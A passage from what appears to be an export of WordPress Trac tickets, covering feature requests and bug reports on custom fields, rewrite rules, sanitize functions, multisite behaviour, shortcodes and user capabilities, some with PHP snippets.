'field', true);` or `$value = get_post_meta($post->ID, 'field', true);` '''My proposed function (or ""template tag"")''' mixed '''get_custom_field''' ( string ''$fieldname'' [, int ''$post_id'' ] ) `$value = get_custom_field('field');` It picks the current object like so: {{{ Passed post object ID? / \ yes no | | use it | | within Loop? / \ yes no | | use current | Loop ID | | currently queried object is singular? / \ yes no | | use its ID ID = 0 }}}" filosofo Future Releases 35326 New taxonomy template Taxonomy normal normal Future Release enhancement new dev-feedback 2016-01-06T10:29:26Z 2017-02-05T14:21:10Z "I sugest neww taxonomy template: taxonomy-{$term->term_id}.php. taxonomy-$taxonomy-{$term->slug}.php is bad because if I change slug then I must remember about change filename. In my website this isn't problem but if client change name on website then will be problem." sebastian.pisula Future Releases 18450 New safe action to add rewrite rules on Rewrite Rules 3.2.1 normal normal Awaiting Review enhancement new dev-feedback 2011-08-16T19:56:10Z 2018-09-21T18:07:32Z "Currently I don't believe it's possible to meet the following two criteria: * Not flush rewrite rules on every page load * Ensure that you always have your rewrite rules available The problem arises when Plugin A has not yet added it's rewrite rules, but Plugin B calls ```flush_rewrite_rules```. Plugin A is a good citizen, and doesn't call ```flush_rewrite_rules``` unless it needs to and so now it's rewrite rules are no longer present. (See http://wordpress.stackexchange.com/questions/26029/when-to-call-add-rewrite-rule-for-safety for more.) Westi suggested that hooks on delete_option and get_option of 'rewrite_rules' might work. This covers almost all situations, except the one where permalinks are off and then get turned on again when neither the delete_option or get_option actions/filters are fired. Devs could hook the new action for their ```add_rewrite_rule``` calls, and use their own methodology to determine when to call ```flush_rewrite_rules```. Two attachments: * Example plugin, showing (hopefully) the problem with the existing situation * Diff showing where the hook might be added " simonwheatley Future Releases 14460 New Permission for no_user_edit so users with edit_users can't edit it Users 3.0 normal normal feature request new dev-feedback 2010-07-29T23:28:18Z 2019-06-05T06:37:28Z "I recently experienced a problem where I have an administrator role with full access and a site administrator role with most access including the ability add, edit, and delete users. However, I don't want the Site Administrator to be able to delete users of the role Administrator. The change I'm proposing is a new permission or marker which states that if enabled, this user can't be changed by another user who isn't the same role. If possible, I might try to add the patch myself. This is a fairly important issue which would is interfering with WordPress' use as a content management system, and the only work around I've found is to edit core file." brandon.wamboldt Future Releases 23205 New Media Uploader slow for sites with many images Media 3.5 normal normal enhancement new dev-feedback 2013-01-15T17:17:02Z 2019-06-04T20:04:40Z "The new media uploader added in 3.5 looks very nice. Unfortunately, its functionality is worse for sites with thousands of images. I think this can be combated by allowing us to select the ""Upload Files"" page as our default after clicking ""Add Media,"" and rather than ""All Media Items"" be the page it jumps to after the image is uploaded, instead have it jump to ""Uploaded to this Post."" Is there any way the WordPress team can make this default? Or add the option to make it default? It's made posting on my site 10 times more annoying, especially for those posts with 40-50 images. And I'm sure there are others who feel the same." salromano Future Releases 26759 New Generic Sanitize Functions for Core Formatting 3.8 normal normal enhancement new dev-feedback 2014-01-02T17:54:48Z 2019-06-04T19:45:16Z "Core currently supplies a number of sanitize functions: {{{ sanitize_email() sanitize_file_name() sanitize_html_class() sanitize_key() sanitize_meta() sanitize_mime_type() sanitize_option() sanitize_sql_orderby() sanitize_post_field() sanitize_text_field() sanitize_title() sanitize_title_for_query() sanitize_title_with_dashes() sanitize_user() }}} They all sanitize by usage, not by data type. As such, I (and I suspect others) wind up using these to escape things they weren't initially meant for -- for the sake of brevity, and it's just quicker and leads to tidier code. I believe it could result in better and simpler sanitizing if we were to include sanitize-by-format functions in core. For example, {{{ wp_sanitize_numeric( $raw ); // [\d] wp_sanitize_numeric_float( $raw ); // [\d\.,] allowing both commas and periods as decimal indicator and thousands seperator wp_sanitize_hex( $raw ); // [\da-f] case-insensitive wp_sanitize_alphanumeric( $raw ); // [\da-z] case-insensitive wp_sanitize_letters( $raw ); // [a-z] case-insensitive wp_sanitize( $raw, $regex ); // uses passed in regex to determine what to strip. }}} The specific functions to use are up for discussion. I'm just hoping to make it simpler for users to sanitize data by expected type. As a side note, this will let folks use `wp_sanitize_numeric()` to sanitize integers larger than `PHP_INT_MAX` -- which tumblr and twitter IDs often happen to be for imports and feeds and the like (as casting to `(int)` isn't a good idea)." georgestephanis Future Releases 34699 New function: `get_query_arg()` General normal normal Future Release enhancement new dev-feedback 2015-11-16T12:51:31Z 2021-07-20T08:07:55Z "For example i have url $url = 'http://example.com/?param=1¶m2=2¶m3=3' and I want get `param2` so I use function: get_query_arg('param2', $url); Second argument: exists function add_query_arg and remove_query_arg" sebastian.pisula Future Releases 35097 New filter: `edit_post_type_title` Posts, Post Types normal normal Awaiting Review enhancement new dev-feedback 2015-12-15T09:15:30Z 2017-02-05T13:53:13Z "Filter in edit.php to filter title. Why ? I filter this page by term and I want have title of current term edit.php?post_type=investor-day&funds-categories=title" sebastian.pisula Future Releases 39848 New filter 'the_title_wrap' Posts, Post Types 4.7.2 normal normal Awaiting Review enhancement new dev-feedback 2017-02-11T20:46:21Z 2017-07-03T15:18:35Z "== Problem: In plugin I wish to add some markup after/before the post and page title so, naturally, I use `the_title` filter. However, this filter is applied on `get_the_title()` function which is used by all instances of post title all over the page (menus, edit links etc). On top of that, more and more themes are using `the_title()` with before and after params which makes all my custom markup wrapped inside this before and after. So when theme is using `the_title( '<h1 class=""entry-title"">', '</h1>' )`, and my markup in filter is, for example an image, then I get: {{{ <h1 class=""entry-title"">The title <img src=""image.jpg"" ></h1> }}} Or something even worse if my custom markup is more complex. == Proposal (possible solution): I have tested another filter on `the_title()` function **(wp-includes/post-template.php)** and it gave me exactly what I needed: {{{#!php /** * Display or retrieve the current post title with optional markup. * * @since 0.71 * * @param string $before Optional. Markup to prepend to the title. Default empty. * @param string $after Optional. Markup to append to the title. Default empty. * @param bool $echo Optional. Whether to echo or return the title. Default true for echo. * @return string|void Current post title if $echo is false. */ function the_title( $before = '', $after = '', $echo = true ) { $title = get_the_title(); if ( strlen($title) == 0 ) return; $title = $before . $title . $after; /** * Filters the post title after 'the_title' filter. * * @param string $title The post title. */ $title = apply_filters( 'the_title_wrap', $title ); if ( $echo ) echo $title; else return $title; } }}} I named it `the_title_wrap` because it wraps everything that comes with `the_title` function and filter. This filter doesn't apply on menus, edit links etc. Tested on twenty* themes, it applies only on posts and pages title on singulars and on posts title inside the loop on archive pages. Also, my custom markup doesn't end up inside `<h1>` or `<a>` tags. Now it looks like this: {{{ <h1 class=""entry-title"">The title</h1><img src=""image.jpg"" > }}} This is, of course, somewhat uncertain because I'm counting on theme author to use `the_title()` instead of `get_the_title()` but I think it's worth of effort as sometimes it becomes nearly impossible to target only entry title on singular or inside loop on archives etc. Thank you." milana_cap Future Releases 45829 New editor replaces > with > within <pre> tag Editor 5.0.2 normal major Awaiting Review defect (bug) new dev-feedback 2019-01-04T13:09:07Z 2020-01-14T19:07:58Z "Hi, I just updated to WordPress 5 and started using the new block editor. I typeset source code in my posts using a <pre> tag. This code contains a > comparison operator. Upon saving my draft, > gets replaced with >, and this entity is also displayed in the article preview. This happens even if I disable the visual editor. The old editor does not present this bug and installing the Classic Editor extension allowed me to work around this." yannsalmon Future Releases 49602 New design for Privacy settings page and hooks Privacy normal normal Awaiting Review enhancement new dev-feedback 2020-03-08T19:15:39Z 2020-12-16T07:55:25Z "I proposed a year ago some changes on privacy settings page Hereattached are the updated screenshots Can it be possible to add a hook on this page for plugins to add some simple settings. Thank you" arena Future Releases 31387 New core API for adding Meta tags to the header General normal normal Awaiting Review enhancement assigned dev-feedback 2015-02-19T19:08:23Z 2021-08-11T15:56:09Z "There is often a conflict between one or more plugins about registering meta tags in the header. Meta tags that shouldn't be duplicated, it's difficult to know which one should 'win'. A lightweight framework in core that multiple plugins could use to register meta tags seems like it would be useful. It would need to handle several different attributes for all use cases -- `name` `property` `http-equiv` `charset` -- possibly generic `data-*` attributes? Uncertain. Twitter discussion: https://twitter.com/nacin/status/562109983069061120 (up and down the thread) My first swing at it: https://gist.github.com/georgestephanis/0f0cca2c5f1a6cd4aab2" georgestephanis Future Releases 23179 New avatar related option - use gravatar only for registered users Comments normal normal enhancement new dev-feedback 2013-01-11T15:40:59Z 2019-06-04T19:23:48Z "The use of gravater is problematic because there is no attempt to verify that a comment with which an email was used was actually left by the owner of the email (AFAICT gravatar doesn't even have an API for authentication). This makes impersonating to someone else that have a gravatar in a wordpress site comments much too easy. IMO non autogenerated gravatars should be displayed by default only for users for which it is known that they actually own the email address, which are usually only the registered users." mark-k Future Releases 43233 Network transients Networks and Sites 2.9 normal normal Future Release enhancement new dev-feedback 2018-02-06T09:28:25Z 2020-05-12T17:03:35Z "Currently site (network) transients do not support multi network. For sites with object caching it stores the transient as a global and for sites without object caching, it stores it on the current networks options. This is a strange behavour, as object cached sites act very differet from none. The behaviour should be the same on both types of site and how type of store a network transient should be better defined. Is it a global store or a network level store. " spacedmonkey Future Releases 15801 Network Admin: Deactivated / Deleted inconsistency Networks and Sites 3.1 normal normal Future Release defect (bug) assigned dev-feedback 2010-12-13T18:12:54Z 2023-06-10T12:03:52Z "Under the Sites screen, there are distinct inline links for Deactivate and Delete. However, when a site is deactivated, it is referred to as deleted in: * Sites screen inline status * Edit Site screen attributes section * Error page for non-admins visiting the site" kawauso Future Releases 15691 Network admin should have its own settings API Networks and Sites 3.0 normal normal Future Release feature request new needs-unit-tests 2010-12-05T19:31:17Z 2017-09-07T10:27:33Z preferably using options.php and the same API as normal admin, this way making a plugin multisite compatible (ie. adding a Network admin screen to it) would be much easier. joostdevalk Future Releases 38076 Network admin plugin pages can be accessed on non-multisite Administration normal normal Future Release defect (bug) new dev-feedback 2016-09-16T19:56:07Z 2021-07-06T10:28:05Z "I just noticed that it's theoretically possible to access a plugin-generated page in the network admin panel even if we're not on a multisite setup. The same applies to the user admin panel as well. To replicate, create a plugin that uses `add_menu_page()` with a slug `my_test_page`, hooked into `network_admin_menu`. Then manually go to the URL `http://yourdomain.com/wp-admin/network/admin.php?page=my_test_page`. This happens because the `is_multisite()` check happens only after including the general `wp-admin/admin.php` administration bootstrap file which takes care of any plugin pages by itself. The problem is we can't do it before because WordPress hasn't been loaded then. A possible solution would be to split the `require_once` statement in `wp-admin/network/admin.php` into two, one to load the WordPress core functions, the other to load `wp-admin/admin.php`. I don't think this is a very critical issue, but I thought it should be a ticket. It's very unlikely that anyone tries to access a network admin URL when they don't have a multisite. On the other hand, we catch that in other areas (through `! is_multisite()` checks), so we might try to do it here as well." flixos90 Future Releases 34293 Network Admin Email description doesn't really explain what it is. Networks and Sites normal normal enhancement new dev-feedback 2015-10-13T21:18:49Z 2019-06-04T20:52:18Z "On /wp-admin/network/settings.php the field for **Network Admin Email** has this as the description: > This email address will receive notifications. Registration and support emails will also come from this address. By contrast, the per-site has this: > This address is used for admin purposes, like new user notification. I propose we change the Network Admin one to this: > This address is used for admin purposes, like site notifications. Registration and support emails will be sent from this address. That makes for a little more parity, and explains more clearly that emails are sent FROM this address (which has been unclear to some). The attached patch comes in two versions. 1) As I originally proposed 2) Without the 'and support' phrase since I have no idea what we are referring to with that one." Ipstenu Future Releases 43197 Nesting @media rule inside @supports rule fails CSS validation Customize 4.9.2 normal normal Awaiting Review defect (bug) new dev-feedback 2018-02-01T10:13:49Z 2021-05-30T17:30:28Z "The CSS editor in the Customize panel returns 2 syntax errors when trying to insert a `@media` rule inside a `@supports` rule. It does work fine the other way around. See screenshot: [[Image(https://i.imgur.com/81b01Bp.png)]] Results are independent of specified properties & values. This might impact performance, because it is faster to skip the entire content of a feature query if a browser does not support a certain feature, rather than having multiple media queries with `@supports` in each of them. Besides, it can be functionally different, as explained here: https://stackoverflow.com/a/42438244 Tested on Chrome 63 and Windows 7. " neoqueto Future Releases 37183 Nested shortcodes in new-style [caption] Shortcodes 3.4 normal normal defect (bug) new dev-feedback 2016-06-26T13:05:25Z 2021-05-08T23:34:46Z "Splitting this of from #24990 after discussions on WCEU contributor day: Having something like `[caption][shortcode]<a href=""""><img></a>[/shortcode] Caption Text[/caption]` does not work. The opening shortcode get's thrown out completely because `caption` only begins to parse at `<a ...`. The problem lies in the regex line {{{ if ( preg_match( '#((?:<a [^>]+>\s*)?<img [^>]+>(?:\s*</a>)?)(.*)#is', $content, $matches ) ) { }}} that throws out any shortcode enclosing the image and/or link tag in the `$content`. Currently, the only workaround is to replace {{{wp_caption}}} and {{{caption}}} entirely, like this: {{{ function media_credit_caption_shortcode($attr, $content = null) { // New-style shortcode with the caption inside the shortcode with the link and image tags. if ( ! isset( $attr['caption'] ) ) { if ( preg_match( '#((?:\[media-credit[^\]]+\]\s*)(?:<a [^>]+>\s*)?<img [^>]+>(?:\s*</a>)?(?:\s*\[/media-credit\])?)(.*)#is', $content, $matches ) ) { $content = $matches[1]; $attr['caption'] = trim( $matches[2] ); } } return img_caption_shortcode($attr, $content); } add_shortcode('wp_caption', 'media_credit_caption_shortcode'); add_shortcode('caption', 'media_credit_caption_shortcode'); }}} The regex can't be removed entirely because it converts the new-style caption syntax introduced in WordPress 3.4 to the older one used internally. Following a suggestion from @tychay, I've come with the attached patch filtering the `$matches` instead of the regex itself. The proposed filter would also enable new-style captions for media elements other than `<img>` (which currently are only supported if you use the old-style attribute syntax). The default behavior is not changed, though. Currently existing unit tests are not affected." pputzer Future Releases 24990 Nested Shortcode Inside [caption] Shortcodes 3.6 normal normal defect (bug) new needs-unit-tests 2013-08-08T09:38:06Z 2021-05-08T23:37:35Z "Nested shortcodes inside caption observation: {{{ [caption]<a href=""""><img alt=""[shortcode]"" title=""[shortcode]""></a> Caption Text [shortcode][/caption] }}} 1. shortcode inside alt and title processed. 2. Caption Text doesn't" prionkor Future Releases 58515 Need to use $wpdb->prepare instead of sprintf Query normal normal Awaiting Review defect (bug) new dev-feedback 2023-06-12T13:04:00Z 2023-06-22T07:25:46Z "Need to use $wpdb->prepare instead of sprintf in ""_prime_comment_caches"" functions. File: wp-includes/comment.php" hiren1094 Future Releases 3329 Need to strip % from the auto-permalink in the editor. pishmishy* Permalinks 2.0 normal normal Future Release defect (bug) accepted needs-unit-tests 2006-11-04T20:41:06Z 2023-02-02T12:43:17Z "I made an article with ""x = 18,98 * y - %10"" as title, and this generated http://www.example.com/blog/2006/11/03/x-1898-y-%10/ which doesn't work." Heyneken Future Releases 56527 Need specific SAN and common name for .CSR file to generate website certificate that does not expire General normal normal Awaiting Review enhancement new dev-feedback 2022-09-07T16:11:29Z 2022-09-07T16:11:29Z "Hello I am trying to get the calsaws.org website certificate updated to ensure that it does not expire and I am unable to edit the common name and SAN for the .csr file to generate the new certificate. I am trying to get the common name of ""calsaws.org"" and an SAN of ""calsaws.org, www.calsaws.org"" but I can't get that in the .CSR file." gormleyd Future Releases 24776 Need Filter Hooks on Creating Slug - Check Availability of Slug if That is Used for Post, Page, Taxonomy or any Plugin Permalinks normal normal Awaiting Review feature request new dev-feedback 2013-07-16T21:06:09Z 2022-02-14T05:01:30Z "I did not find any '''filter hook''' for choosing slug for any object. I have a plugin that creates its own URLs. eg. example.com/my-campaign . If someone hits on this url then he will see my plugin generated page. But if there is already a page ""'''My Campaign'''"" then WP is unable to show that page because that '''permalink''' already taken by my plugin. So Before creating my plugin slug I need to check '''WP posts, pages and taxonomies''' if any of those already used my slug. I also need to check Root directory of WordPress installation if there is a '''directory with same name''' of my slug. WP Core checks available slug in its own database and reserved words. But it doesn't check slugs those are used by any plugin. If there is a post name ""'''my-campaign'''"" then my plugin don't let to chose this slug but If my plugin took this before and user want create a page ""my-campaign"" then WordPress will take the same slug. And here is the main problem. In the same way my plugin is conflicting with other plugins. My plugin can check WordPress core slugs but not other plugins. ""'''Pretty Link'''"" is one of the most popular plugin. It also creates its own url. It also checks available slug in wordpres db but not in other plugin. Any plugin may have custom rewrite rule, then my plugin can not handle that. So I think we need a standard rule that will be followed by WordPress core and all plugins. I have three different plugins those need own slugs. I made a universal process that I am using in all of my plugins. I am explaining my process bellow. I am using a filter hook ''''onetarek_is_slug_available'''' all of my plugin use this filter before choosing a slug. MY CODES: {{{ <?php function otk_filter_available_slug( $slug, $id=false) { if($slug==false)return false; global $wpdb; #Check if this slug already being used for any posts, pages or categories $has_postname = $wpdb->get_var($wpdb->prepare(""SELECT post_name FROM {$wpdb->posts} WHERE post_name=%s LIMIT 1"",$slug)); $has_taxonomy = $wpdb->get_var($wpdb->prepare(""SELECT taxonomy FROM {$wpdb->term_taxonomy} WHERE taxonomy=%s LIMIT 1"",$slug)); if( $has_postname or $has_taxonomy )return false; #Check if any same named file or directory exists in the root of wordpress installation $root_directory = opendir(ABSPATH); $slug_lower=strtolower($slug); #we consider wp-content and Wp-ContENT and WP-CONTENT are same. while (($file = readdir($root_directory)) !== false) { $filename = strtolower($file); if($filename == $slug_lower) return false; } #Check same slug is exists in click jacker database. #if same slug exists and associate for given id then return slug . We allow this if($id){$id=intval($id);} if($id) { $SQL = $wpdb->prepare(""SELECT slug FROM "".CLICK_JACKER_CAMPAIGN_TABLE."" WHERE slug=%s AND id =%d"", $slug, $id); $has_slug = $wpdb->get_var($SQL); if( $has_slug == $slug ){return $slug;} } #if same slug exists and no id given then we don't accept this. $SQL = $wpdb->prepare(""SELECT slug FROM "".CLICK_JACKER_CAMPAIGN_TABLE."" WHERE slug=%s"", $slug); $has_slug = $wpdb->get_var($SQL); if( $has_slug == $slug )return false; return $slug; } add_filter('onetarek_is_slug_available', 'otk_filter_available_slug', 10, 2); ?> }}} I am calling above filter where I need {{{ <?php $campaign_slug='my-campaign'; $myslug=apply_filters('onetarek_is_slug_available', $campaign_slug); if($myslug) { #use $myslug } else { #chose another slug } ?> }}} My technique is limited. In my filter function I run 2 SQL query to check WP slugs , but that is limited. WordPress has reserved words also, those are not being checked in this process. And my other 2 plugins also run the same. Now if any website uses my 3 plugins then same process will be run 3 times and 6 SQL query will be run to check WP slugs. My function is unable to check the slug of ""Pretty Links"" plugin. But if '''WORDPRESS core''' would have a '''FILTER HOOK''' and run a function with this filter to check any kind of WP slugs then my plugins would search only its own database once. AND other plugin developer would attach a function with this filter. And they would check only their own database. Plugins don't need to check WP slugs because core function already fired with this FILTER HOOK. In the same way WP core should respect other plugin slugs and '''custom url rewrite rules'''. When WP check available slug for post, page, taxonomies then it should use this FILTER also. I THOUGHT THIS WAY BECAUSE I DON'T FIND ANY WAY. IF ANYTHING ALREADY EXISTS IN WP PLEASE LET ME KNOW. Regards Jahidul Islam (oneTarek) [http://onetarek.com] " onetarek Future Releases 28463 Need core concept of the first publication of a post/comment. Posts, Post Types normal normal Awaiting Review feature request new dev-feedback 2014-06-05T17:21:56Z 2022-07-15T14:35:48Z "Because status transitions are permitted to occur in a cyclic fashion, it is possible to publish a post/comment more than once. The first publication event has unique significance, e.g. to push-based subscription delivery systems, but this concept is not represented anywhere in WordPress. Restricting status transitions to a directed acyclic graph is a non-starter. What I have done in plugins (and Nacin also suggests) is to mark the initial publication in meta: if transitioning to publish/approved, try adding the meta; if the add succeeds, this is the initial publication. I suspect that a significant number of plugins duplicate this. It would be even more useful to keep the history of changes to post_status in revisions rather than put ""inherit"" in that field. This would have repercussions in the already complex system for revisions, which has no facility for dealing with changes to non-content fields. It may also conflict with the existing uses of the ""inherit"" status, such as calling get_post_status() on a revision with the intention of getting the parent's status. Status revisions may have other uses as well (see #23314, #12706) but comment revisions don't exist yet. Ultimately what I want is a hook that fires only on the initial publication of a post or comment. The add_post_meta/add_comment_meta system can accomplish this much more easily." andy Future Releases 49166 need a function to know if a dashicon exists. Administration normal normal Awaiting Review enhancement new dev-feedback 2020-01-10T18:27:24Z 2022-05-31T12:36:08Z "Hello, Is there a way to know if a dashicon exist or not? I think there's currently no function and I don't really know if this is possible to create it or not... In my mind, it would be a function as <code>is_dashicon_exists( 'dashicons-linkedin')</code> returning true or false. Do you think it should be possible to create?" sebastienserre Future Releases 54463 Need 'wp_sitemaps_{provider}_url_list' filter for caching. Sitemaps low normal Awaiting Review enhancement new dev-feedback 2021-11-17T19:12:36Z 2023-03-16T15:42:25Z "Currently, there is a `wp_sitemaps_posts_pre_url_list` filter, which can be used to build a custom URL list or **retrieve it from cache**, but there is no filter that would allow us to filter the default URL list or save it to cache. Before returning from `get_url_list()`, it would be great to have a `wp_sitemaps_posts_url_list` filter, which would allow us to filter the default URL list or **save it to cache**." jsmoriss Future Releases 39077 Navigation menu items should be defined as being hierarchical Menus 3.0 normal normal Future Release defect (bug) new dev-feedback 2016-12-04T21:20:29Z 2019-01-14T06:07:22Z "Menu items are hierarchical in nature, as each menu item can be attached as a child to a parent item. This is what allows one to build submenus at differing levels. These hierarchical relationships are persisted into the database using the `post_parent` column to attach parent IDs to child IDs. However, when the `nav_menu_item` is registered during the bootstrapping process, it is defined as being `hierarchical => false`, which is conceptually wrong. It just happens to be irrelevant, because the user interface for menus is a custom implementation that considerably differs from standard post list tables. As these `nav_menu_item` elements might need to be iterated over through other means than the menu UI, they should be correctly represented as being hierarchical in nature (and thus making use of the `post_parent` database table column)." schlessera Future Releases 49773 Navigating through list of posts on single.php is not functioning Posts, Post Types 5.5 normal major Awaiting Review enhancement new dev-feedback 2020-04-01T23:30:54Z 2020-04-02T02:44:45Z "Wordpress is fantastic, but there are some flaws (at least from my perspective). I don't know if this can be classified as a bug or an enhancement, but WordPress expects that (single) pages could contain archive listings and might require pagination, yet single posts do not expected to have archive listings which is causing this issue. Instead of taking the page-slug/page/#/, it should take the post-slug/#/ when using the pagination in single.php. What's happening is that the page # request portion is ignored and $paged will always be 1, and the “wrong” URL is rewritten to the “correct” one. Taking the $paged value from the main query and use it in a custom query often is problematic. So, it does not allow us to add navigate through a list of posts in single.php. When using e.g. this snippet: {{{ <div class=""test"">...</div> <ul class=""pagination""> <li class=""page-item""><?php previous_posts_link('« Previous') ?></li> <li class=""page-item""><?php next_posts_link('Next »') ?></li> </ul> }}} It will only spit out the HTML elements, but not the buttons, as there is nothing to show. Another example: {{{#!php <?php <?php // wp query $wp_query = new WP_Query( array( 'posts_per_page' => 25, 'paged' => $paged, ) ); $paged = ( get_query_var( 'paged' ) ) ? get_query_var( 'paged' ) : 1; if ( $wp_query->have_posts() ) : ?> <!-- pagination here --> <!-- the loop --> <?php while ( $wp_query->have_posts() ) : $wp_query->the_post(); ?> <li id=""test"" data-href=""<?php $blink = get_the_permalink(); ;?>""> <div> <a id=""test"" href=""<?php the_permalink(); ?>""><?php the_title(); ?></a> </div> </li> <?php endwhile; ?> }}} Nothing works. Best case scenario is that it adds a page, but you then get the following: websiteURL/post-url/page/number And of course, that also does not work and therefore you can't scroll through posts as you like. Can we get this checked and hopefully fixed, please? I am desperately waiting for this, and many more are like me (Stackoverflow is filled with these questions)." 1BJK903 Future Releases 41638 Must-Use Plugin File Still Available With a dot at the beginning of a filename (aka supposedly hidden) Plugins 4.8.1 normal normal Awaiting Review defect (bug) new dev-feedback 2017-08-14T22:35:52Z 2022-02-18T19:14:43Z "If you place a dot in front of a must-use plugin file, I believe it shouldn't be included as part of your Must-Use arsenal and the code shouldn't be available as well. Perhaps I'm doing it the wrong way, but when I place a dot in front of something (e.g., folder, file), I expect that file to no longer be available. " ronalfy Future Releases 54299 Multisite: The link in the password retrieval email always points to the main-site Login and Registration normal normal Awaiting Review defect (bug) new dev-feedback 2021-10-20T14:59:52Z 2023-08-18T12:37:19Z "The link in the password retrieval email always points to the main-site. If the password reset was requested on a sub-site then the link in the email should point to that sub-site. This is important because the main-site may be in a different language to the sub-site." henry.wright Future Releases 54298 Multisite: resetpassform always posts to the main-site wp-login.php file Login and Registration normal normal enhancement new dev-feedback 2021-10-20T14:50:00Z 2023-10-01T01:52:18Z The reset password form always posts to the main-site wp-login.php file. If the reset password form on a sub-site is being used then I'd expect the form to post to the sub-site wp-login.php file. henry.wright Future Releases 42280 Multisite: get_blogs_of_user has no useful caching on large installs Networks and Sites 4.7 normal major Awaiting Review defect (bug) new dev-feedback 2017-10-19T16:18:51Z 2023-05-12T19:40:56Z "While thinking about the changes that were happening in #40228 we started to investigate other places where functions had been switched to use `get_sites`. Looking back through ""recent"" changes I found: [38682] / #37061. Previously we would fetch all the user meta for a user and then use get_blog_details (and it’s inherent caching) to populate the list of blogs. Now we fetch all the user meta for a user and then create a query for get_sites which as previously discussed has pointless caching on active multisites inside WP_Site_Query. I'm opening this ticket to ensure that the caching is also reviewed here too." westi Future Releases 54361 Multisite: Confusion for average users when a blog is a mapped domain and requires re-authentication Networks and Sites normal normal Awaiting Review enhancement new dev-feedback 2021-11-02T09:31:05Z 2021-11-15T18:16:49Z "If domain mapping is active for a blog in a network install, users of that blog must re-authenticate when visiting that blog because the domain is likely to be different from the host install domain. Mapped domains appear in the My Sites list. When a user visits their blogs in the list it is confusing for them to be asked to re-authenticate for blog A (mapped domain) and not be asked to re-authenticate for blog B (not a mapped domain). An average user isn't familiar with the cookie authentication mechanism and would find it frustrating to authenticate multiple times which is, to the average user, seemingly unnecessary. How do we make this process clear or easier?" henry.wright Future Releases 49069 Multisite: 404 template isn't used in network installs when a file extension is used in the URL General normal normal Awaiting Review defect (bug) new dev-feedback 2019-12-23T15:31:00Z 2020-04-15T09:08:50Z "The WordPress 404 template isn't used when certain URLs are visited. For example: - https://commons.gc.cuny.edu/sites/file.php - https://blogs.harvard.edu/file.php Note this seems to happen in network installs only. I can't reproduce when using a single install." henry.wright Future Releases 27224 Multisite upload settings are inconsistent jeremyfelt* Networks and Sites normal normal enhancement accepted dev-feedback 2014-02-27T19:22:04Z 2023-07-02T11:16:33Z """Site upload space"" is indicated in MB whilst ""Max upload file size"" is indicated in KB. It would be useful to standardize on MB." danielbachhuber Future Releases 45313 Multisite site deletion email contains misleading language about user account Administration normal normal Awaiting Review enhancement new dev-feedback 2018-11-08T15:35:10Z 2018-11-08T15:35:10Z "In Multisite, you can initiate the deletion of a site via wp-admin/ms-delete-site.php. This triggers an email https://core.trac.wordpress.org/browser/tags/4.9.8/src/wp-admin/ms-delete-site.php?marks=58#L43 that contains the line: > (But remember your current site and username are gone forever.) But the delete link does not, in fact, delete users or usernames. See https://core.trac.wordpress.org/browser/tags/4.9.8/src/wp-admin/ms-delete-site.php?marks=20#L18 This language dates from the MU merge in 3.0. See [12603]. I imagine it was linked to the original conception of WPMU that each user account would correspond to a specific site on the network, a legacy concept that plagues us elsewhere. See #17904, especially https://core.trac.wordpress.org/ticket/17904#comment:14 and subsequent comments. This entire block of text could probably reuse a rethink, since the intended use of Multisite has changed considerably since 2010. I'd suggest changing the email text to something like (using `wpmu_welcome_notification()` as a template): {{{ $content = __( ""Howdy ###USERNAME###, You recently clicked the 'Delete Site' link on your site and filled in a form on that page. If you really want to delete your site, click the link below. Please note that the URL ###SITE_URL### will be unavailable for further use, even after the site is deleted. You will not be asked to confirm again, so only click this link if you are absolutely certain that you'd like to delete your site: ###URL_DELETE### -- The Team @ ###SITE_NAME###"" ); }}}" boonebgorges Future Releases 38789 Multisite sign-up improvements (potential roadmap) Login and Registration 3.0 normal normal Awaiting Review feature request new dev-feedback 2016-11-14T20:06:03Z 2019-03-25T21:18:22Z "The `wp_signups` database table has a few things not going for it: * No `_Query` class * No `WP_Signup` object class * No user interface for moderating them * No query or object caching * A `meta` database column vs. a `wp_signupmeta` database table * `wp-signup.php` is a pretty gnarly file, as is `wp-activate.php` A lack of support for this multisite feature means no one is very likely to use it. Most membership plugins (BuddyPress included) generally wrap around it, but also need to write a bunch of additional code to interface with what's here now. I took a stab at this last week, and made this plugin for a proof-of-concept: * https://wordpress.org/plugins/wp-user-signups * https://github.com/stuttter/wp-user-signups Pretty much all of the pieces are there, minus the meta-data table (which would not be very hard at all.)" johnjamesjacoby Future Releases 23221 Multisite in subdirectory with root site address Bootstrap/Load 3.5 normal normal Awaiting Review defect (bug) reopened dev-feedback 2013-01-16T22:48:52Z 2018-01-21T01:31:19Z "I have seem to have found a url bug in the multisite. = How to replicate = 1. Install WordPress in a subdirectory 2. Change the the url from the subdirectory to the root by adding index.php to the the root and changing the following code. {{{ /** Loads the WordPress Environment and Template */ require('./subdirectory/wp-blog-header.php'); }}} 3. Change the site url in the settings to the root. 4. Start the process to convert the site to a multisite. = Affect = Then it should cause the network dashboard url to be incorrect. You will get http://example.com/wp-admin/network/ instead of http://example.com/subdirectory/wp-admin/network/. " grapplerulrich Future Releases 50260 Multisite - Getting actual user capabilities with get_role_caps() different with current_user_can() Role/Capability 5.4.1 normal normal Awaiting Review defect (bug) new needs-docs 2020-05-27T08:33:02Z 2023-08-04T07:46:39Z "If I check below user capabilities for **Administrator** then I get both capabilities as `false`. {{{ current_user_can( 'install_plugins' ) current_user_can( 'activate_plugins' ) }}} But, If I check the same capabilities by login to the **Super Administrator** then both return `true`. The **administrator** user role has no such capabilities but, If we check the current user capabilities with: {{{ $current_user = wp_get_current_user(); print_r( $current_user->allcaps ); print_r( $current_user->get_role_caps() ); }}} Then for the **administrator** user role, I get below a list of capabilities: {{{ // Array // ( // [switch_themes] => 1 // [edit_themes] => 1 // [activate_plugins] => 1 // [edit_plugins] => 1 // [edit_users] => 1 // [edit_files] => 1 // [manage_options] => 1 // [moderate_comments] => 1 // [manage_categories] => 1 // [manage_links] => 1 // [upload_files] => 1 // [import] => 1 // [unfiltered_html] => 1 // [edit_posts] => 1 // [edit_others_posts] => 1 // [edit_published_posts] => 1 // [publish_posts] => 1 // [edit_pages] => 1 // [read] => 1 // [level_10] => 1 // [level_9] => 1 // [level_8] => 1 // [level_7] => 1 // [level_6] => 1 // [level_5] => 1 // [level_4] => 1 // [level_3] => 1 // [level_2] => 1 // [level_1] => 1 // [level_0] => 1 // [edit_others_pages] => 1 // [edit_published_pages] => 1 // [publish_pages] => 1 // [delete_pages] => 1 // [delete_others_pages] => 1 // [delete_published_pages] => 1 // [delete_posts] => 1 // [delete_others_posts] => 1 // [delete_published_posts] => 1 // [delete_private_posts] => 1 // [edit_private_posts] => 1 // [read_private_posts] => 1 // 